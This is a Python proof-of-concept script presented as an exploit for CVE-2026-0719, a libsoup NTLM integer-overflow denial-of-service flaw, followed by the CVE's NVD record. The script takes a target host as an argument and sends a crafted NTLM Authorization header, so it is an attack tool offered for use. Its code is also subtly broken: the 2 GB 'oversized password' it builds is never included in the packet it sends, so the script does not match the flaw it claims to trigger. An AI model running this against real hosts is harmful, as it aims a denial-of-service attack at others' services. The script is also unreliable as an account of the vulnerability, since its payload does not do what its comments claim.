CVE-2026-0719

import socket import struct import sys # PoC for CVE-2026-0719: libsoup NTLM Integer Overflow DoS # This PoC demonstrates sending a malicious NTLM authentication request # with an oversized password field to trigger integer overflow in libsoup def create_ntlm_negotiate_packet(): """Create NTLM NEGOTIATE message with oversized password field""" # NTLM Signature signature = b'NTLMSSP\x00' # Message Type: Negotiate (0x01) msg_type = struct.pack('<I', 1) # Negotiate Flags negotiate_flags = struct.pack('<I', 0xE2088297) # Domain Name (empty) domain_name = b'\x00\x00' # Workstation Name (empty) workstation = b'\x00\x00' # Oversized password field to trigger integer overflow # Password length > INT_MAX will cause signed int overflow oversized_password = b'A' * (2**31 + 1000) # > 2GB password_len = struct.pack('<H', len(oversized_password) & 0xFFFF) password_max_len = password_len password_offset = struct.pack('<I', 0) ntlm_packet = signature + msg_type + negotiate_flags + domain_name + workstation return ntlm_packet def exploit(target_host, target_port=80): """Send malicious NTLM request to trigger vulnerability""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) # Send HTTP request with malicious NTLM Authorization header http_request = b'GET / HTTP/1.1\r\n' http_request += b'Host: ' + target_host.encode() + b'\r\n' http_request += b'Authorization: NTLM ' ntlm_data = create_ntlm_negotiate_packet() import base64 http_request += base64.b64encode(ntlm_data) + b'\r\n\r\n' sock.send(http_request) print(f'[+] Malicious NTLM request sent to {target_host}:{target_port}') print(f'[+] Payload size: {len(ntlm_data)} bytes') sock.close() return True except Exception as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_host>') sys.exit(1) exploit(sys.argv[1])

{"cve": {"id": "CVE-2026-0719", "sourceIdentifier": "[email protected]", "published": "2026-01-08T13:15:43.283", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was identified in the NTLM authentication handling of the libsoup HTTP library, used by GNOME and other applications for network communication. When processing extremely long passwords, an internal size calculation can overflow due to improper use of signed integers. This results in incorrect memory allocation on the stack, followed by unsafe memory copying. As a result, applications using libsoup may crash unexpectedly, creating a denial-of-service risk."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:1948", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2005", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2006", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2007", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2008", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2049", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2182", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2214", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2215", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2216", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2396", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2402", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2512", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2513", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2514", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2528", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2529", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2628", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2844", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-0719", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427906", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libsoup/-/issues/477", "source": "[email protected]"}]}}